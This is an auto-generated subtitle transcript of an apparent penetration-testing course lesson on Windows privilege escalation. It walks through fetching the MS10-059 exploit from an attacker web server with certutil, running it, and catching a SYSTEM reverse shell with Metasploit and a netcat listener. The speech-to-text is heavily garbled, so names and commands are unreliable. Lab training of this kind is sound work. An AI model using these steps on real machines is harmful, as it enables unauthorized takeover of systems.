1 00:00:00,960 --> 00:00:02,870 Hey, we didn't lecture. 2 00:00:02,910 --> 00:00:11,310 We're going to see how we can escalate our privileges with a manual exploit or manual leverage and privilege, 3 00:00:11,320 --> 00:00:12,730 escalation, opportunity. 4 00:00:12,900 --> 00:00:22,680 OK, so far I have managed to show you how to manually download and exploit into your windows shell, 5 00:00:22,830 --> 00:00:28,190 but we haven't actually executed it, so we haven't seen how it works. 6 00:00:28,770 --> 00:00:35,060 So I'm going to find that one that will not run on the Métis Floyd modules. 7 00:00:35,280 --> 00:00:41,490 OK, so I actually opened the Windows exploits register over here, other metal plates adjuster. 8 00:00:41,730 --> 00:00:50,520 And we're going to go for one of the suggested vulnerabilities over here, which is Amsden, all 59, 9 00:00:50,820 --> 00:00:52,020 which is this one. 10 00:00:52,310 --> 00:00:58,260 OK, and as you can see, it says that this service could allow elevation of privilege. 11 00:00:58,860 --> 00:01:06,330 So this is a gain and exploit or we can use this to escalate our privilege, but it doesn't have that 12 00:01:06,330 --> 00:01:08,050 module Inmet exploit. 13 00:01:08,520 --> 00:01:15,390 So what I'm going to do if you come over here, you can check to see yourselves that we don't have Maston 14 00:01:15,390 --> 00:01:17,540 all 59 or dare. 15 00:01:17,940 --> 00:01:24,930 So rather than searching it in the metal exploit, I'm just going to go and search it in Google and 16 00:01:24,930 --> 00:01:26,460 find the exploit itself. 17 00:01:27,180 --> 00:01:29,270 So I'm going to open the Google over here. 18 00:01:29,610 --> 00:01:33,340 So let's close this down and just go to Google dot com. 19 00:01:33,660 --> 00:01:36,230 OK, let's close everything else over here. 20 00:01:36,780 --> 00:01:43,170 So I'm going to Pastis and just search for Moyston 059 exploit. 21 00:01:43,560 --> 00:01:50,760 OK, so as you can see, we get a lot of results back and it starts with the getup and it's also in 22 00:01:50,760 --> 00:01:54,230 Exploit DB and Reppert seven here as well. 23 00:01:54,870 --> 00:01:56,340 So far so good. 24 00:01:56,370 --> 00:01:58,920 So I believe we have another one over here. 25 00:01:59,940 --> 00:02:08,790 But I want to draw your attention to this GitHub page, which is which actually contains this Moyston 26 00:02:08,790 --> 00:02:11,160 059 Excel file. 27 00:02:11,520 --> 00:02:16,600 OK, and apparently the usage of this file is very easy. 28 00:02:16,860 --> 00:02:21,470 All we have to do is just run it with these parameters over here, OK? 29 00:02:21,480 --> 00:02:25,940 And it will just escalate our privilege like this. 30 00:02:26,730 --> 00:02:31,700 So we're going to see how to use it and how to give this comment. 31 00:02:32,520 --> 00:02:38,940 But before we come over there, let me try to find some more information about this exploit. 32 00:02:39,390 --> 00:02:44,970 And I believe there is not so much of intense description in the exploit. 33 00:02:44,970 --> 00:02:51,570 DB as well as you can see, only says that an attacker can exploit this issue to execute an arbitrary 34 00:02:51,570 --> 00:02:53,570 code with the system level privileges. 35 00:02:53,790 --> 00:03:00,870 So all we are doing over here is just we are exploiting some kind of vulnerability and it can lead us 36 00:03:00,870 --> 00:03:06,840 to execute an arbitrary code and it has the code in here. 37 00:03:06,840 --> 00:03:10,050 So it has the code in the offensive security setup. 38 00:03:10,560 --> 00:03:12,490 OK, if we leave there? 39 00:03:12,780 --> 00:03:20,820 No, it doesn't let us see the code, but we can always go for that zip file and see the code ourselves. 40 00:03:21,450 --> 00:03:28,530 Of course, we can try to search for discrepant seven here as well, but I don't believe we have a good 41 00:03:28,530 --> 00:03:29,510 thing over here. 42 00:03:29,820 --> 00:03:32,190 So let me try to save this file. 43 00:03:32,500 --> 00:03:38,280 Does that zip file and let me try to find that file on my downloads folder. 44 00:03:39,030 --> 00:03:40,460 So let's see. 45 00:03:40,500 --> 00:03:41,400 Yeah, here you go. 46 00:03:41,850 --> 00:03:50,010 As you can see, we have the source code over here so we can try to compile it ourselves. 47 00:03:50,370 --> 00:03:57,760 And as you can see, it's only gives us the descriptions and instructions for compilation of this file. 48 00:03:58,170 --> 00:04:03,380 OK, but I'm going to just delete this because we have already found the file. 49 00:04:03,630 --> 00:04:10,010 I just wanted to show you that if you don't trust the X Files, you can just compile it yourselves. 50 00:04:10,440 --> 00:04:12,780 But again, why not? 51 00:04:12,790 --> 00:04:13,570 Why not? 52 00:04:13,590 --> 00:04:16,050 We tried these files ourselves. 53 00:04:16,800 --> 00:04:24,660 The GetUp page that I have shown you is actually a very good page and actually very comprehensive page 54 00:04:24,660 --> 00:04:28,410 when it comes to Windows privileges escalation. 55 00:04:28,410 --> 00:04:33,900 And it has a lot of XY files embedded in it, so you can't trust that one. 56 00:04:33,900 --> 00:04:35,700 So let me show you one more time. 57 00:04:35,970 --> 00:04:39,120 So this is the one that I'm talking about, SEC Squeaky. 58 00:04:39,450 --> 00:04:42,130 OK, just make sure you follow this page. 59 00:04:42,130 --> 00:04:43,470 You're just like this page. 60 00:04:43,740 --> 00:04:44,730 Follow this page. 61 00:04:44,970 --> 00:04:48,960 And as you can see, there are a lot of repositories over here. 62 00:04:48,960 --> 00:04:55,850 What we are interested in is the windows currently exploit, but it also has the Linux kernel exploits 63 00:04:55,860 --> 00:04:56,580 here as well. 64 00:04:56,790 --> 00:04:59,820 And as you can see, we have a lot of different. 65 00:05:00,480 --> 00:05:03,900 Exploits for each kind of vulnerability over here. 66 00:05:04,620 --> 00:05:13,260 So what we are trying to find is the most 059, but then you find a kernel exploit or kernel vulnerability 67 00:05:13,260 --> 00:05:14,030 in the windows. 68 00:05:14,250 --> 00:05:16,070 Just make sure you come over here. 69 00:05:16,590 --> 00:05:21,360 So I'm going to download the MSM all 59 GHC to my colonics. 70 00:05:21,600 --> 00:05:27,630 It will just give me a warning, but I'm going to say open and find the file on my downloads folder. 71 00:05:27,750 --> 00:05:33,000 I'm going to cut this and put it in my file system. 72 00:05:33,000 --> 00:05:37,680 VAR W-w HDMI and here you go. 73 00:05:38,040 --> 00:05:44,670 So this is sitting in my web server is route so I can reach it from the outside world. 74 00:05:44,670 --> 00:05:51,530 So I'm going to rename this to Amstetten, that a.m. Eastern 059 that XY. 75 00:05:51,840 --> 00:05:54,780 OK, so it would be easy for me to find. 76 00:05:55,830 --> 00:06:02,940 And right now we have the Métis Floyd Interpreter station actually if on Session Zel and we are in the 77 00:06:02,970 --> 00:06:07,080 interpreter, I'm going to background this and show you that I have the section. 78 00:06:07,500 --> 00:06:12,750 OK, as you can see, we have the station, but we're going to pretend that we don't even have an interpreter 79 00:06:12,750 --> 00:06:20,040 station in this case so that we can actually try to see what happens if we don't have the interpreter. 80 00:06:20,100 --> 00:06:24,450 OK, so I'm going to exit out of this one and just do the thing from scratch. 81 00:06:24,660 --> 00:06:33,480 I'm going to go into the metal exploit, OK, by running MSF council on my machine and we can try to 82 00:06:33,480 --> 00:06:37,610 get the station back from that exploit in the metal exploit. 83 00:06:37,620 --> 00:06:39,600 Of course, that would be our first choice. 84 00:06:39,930 --> 00:06:44,480 But if it doesn't work, we can always listen with the Netcare as well. 85 00:06:44,760 --> 00:06:46,410 So let's see how it works. 86 00:06:46,560 --> 00:06:49,710 I'm going to go into the use exploit multicenter. 87 00:06:49,890 --> 00:06:59,670 I'm going to set the payload to Windows Interpretor reverse TCP, OK, and I'm going to show the options. 88 00:06:59,670 --> 00:07:04,440 I'm going to set the Atheros to my own IP address, which is done zero. 89 00:07:04,590 --> 00:07:08,160 I'm going to set the output to 42 42. 90 00:07:08,370 --> 00:07:16,020 I'm going to exploit this and I'm gonna go back to my SBX and run it so that I have the station over 91 00:07:16,020 --> 00:07:16,420 here. 92 00:07:16,800 --> 00:07:17,620 So here you go. 93 00:07:17,620 --> 00:07:18,540 We have the station. 94 00:07:19,020 --> 00:07:24,510 So what I'm going to do, I'm going to go into that station and as you can see, it's in the station 95 00:07:24,510 --> 00:07:32,190 one so you can just interact with it, OK, in order to just download this from our Web server. 96 00:07:32,460 --> 00:07:35,280 So it's sitting on my route right now. 97 00:07:35,640 --> 00:07:41,250 So I'm going to come over here and run sections one and I'm going to go into the shell. 98 00:07:41,250 --> 00:07:47,100 As I said before, we're going to pretend that we don't even have the metro station or an interpreter 99 00:07:47,100 --> 00:07:47,580 station. 100 00:07:47,970 --> 00:07:53,250 So I'm going to go into the temp folder, as we have seen before, and I'm going to run the 32. 101 00:07:53,520 --> 00:07:55,920 So I'm going to say Circuital Eurail cache. 102 00:07:55,920 --> 00:08:00,480 And for the F, I'm going to just specify the HDB tunnel. 103 00:08:00,830 --> 00:08:03,000 Ten, 10, 14, 19, MS. 104 00:08:03,690 --> 00:08:06,080 Ten 059 XY. 105 00:08:06,090 --> 00:08:10,700 And I'm going to call this Amstetten Data XY. 106 00:08:10,980 --> 00:08:15,510 OK, so it will be downloaded to my temp folder over here. 107 00:08:15,630 --> 00:08:21,390 And once we download this, we have to actually have this file on our temp folder. 108 00:08:21,390 --> 00:08:24,900 Let's see, it says on line and here you go. 109 00:08:24,900 --> 00:08:26,580 It says completed successfully. 110 00:08:26,580 --> 00:08:31,020 If you're on there, then we can see them a standard X over here. 111 00:08:31,410 --> 00:08:32,570 So far, so good. 112 00:08:32,850 --> 00:08:38,520 Now we need to run this file and we need to listen for incoming connections. 113 00:08:38,760 --> 00:08:41,130 OK, Onaka Linux, obviously. 114 00:08:41,610 --> 00:08:49,560 Now, if I may stand out, it will say that Chimichurri or Kemistry, I don't know how it's pronounced, 115 00:08:49,560 --> 00:08:58,490 but it apparently gives us the local system shall if we use this as IP address and port with IP address 116 00:08:58,500 --> 00:08:58,910 import. 117 00:08:59,340 --> 00:09:03,390 So this is kind of a back door, but we need to run it manually. 118 00:09:03,840 --> 00:09:06,630 So it's very easy for us to do that. 119 00:09:06,630 --> 00:09:11,670 All we have to do is just supply our IP address along with Siavash part number. 120 00:09:12,000 --> 00:09:13,320 So I'm going to supply it. 121 00:09:13,620 --> 00:09:14,760 And for the port. 122 00:09:14,760 --> 00:09:17,300 No, I'm just going to go with one, two, three, four. 123 00:09:17,640 --> 00:09:25,080 Now again, you can try to get this reverse shell back in Mattos loiters bhau, but we're pretending 124 00:09:25,080 --> 00:09:29,700 that we don't have anything to do with the MSF council, Ormet, the split itself. 125 00:09:30,240 --> 00:09:38,220 So I believe we can go for the next cat in order to listen for incoming call and then choose and see 126 00:09:38,220 --> 00:09:42,450 what happens if we get the child back with that cat again. 127 00:09:42,450 --> 00:09:49,110 It's advantages to get this with an interpreter, but I don't think this exploit gives us the interpreter 128 00:09:49,110 --> 00:09:49,950 shot anyway. 129 00:09:50,310 --> 00:09:56,370 So I'm going to go for NCM VLP one, two, three, four, OK, and I'm going to hit enter over here 130 00:09:56,760 --> 00:09:59,400 and this will just run the country. 131 00:09:59,490 --> 00:10:01,600 Or whatever it is. 132 00:10:02,020 --> 00:10:10,590 OK, and let's see if we get the connection here, let's wait for a minute and let's see if we can get 133 00:10:10,590 --> 00:10:11,540 the connection. 134 00:10:12,540 --> 00:10:19,480 Um, yeah, it seems like it's working, but we don't get the connection for some reason. 135 00:10:20,040 --> 00:10:21,450 Let's try to. 136 00:10:21,450 --> 00:10:22,430 Yeah, here you go. 137 00:10:22,740 --> 00:10:24,180 It gives us something. 138 00:10:24,180 --> 00:10:25,230 And yeah, here you go. 139 00:10:25,230 --> 00:10:26,030 We have the shell. 140 00:10:26,340 --> 00:10:27,270 So if I were on. 141 00:10:27,270 --> 00:10:27,840 Where am I. 142 00:10:27,990 --> 00:10:28,610 Here you go. 143 00:10:28,620 --> 00:10:30,890 We are the end theater to system. 144 00:10:31,320 --> 00:10:34,260 So it took a while, but it gives us the shell. 145 00:10:34,260 --> 00:10:39,240 So that's what's important and very administrator right now, as you can see. 146 00:10:39,660 --> 00:10:47,970 So this is how you do a manual exploitation in order to gain an escalated privilege in the windows as 147 00:10:47,970 --> 00:10:48,250 well. 148 00:10:48,870 --> 00:10:54,210 So far, we have covered a lot of topics regarding the Windows exploitation. 149 00:10:54,390 --> 00:11:00,180 I believe it's time to move on to another machine for windows so that we can get to practice what we 150 00:11:00,180 --> 00:11:03,090 have learned so far and also learn something new. 151 00:11:03,480 --> 00:11:06,570 We're going to do that within the next section together.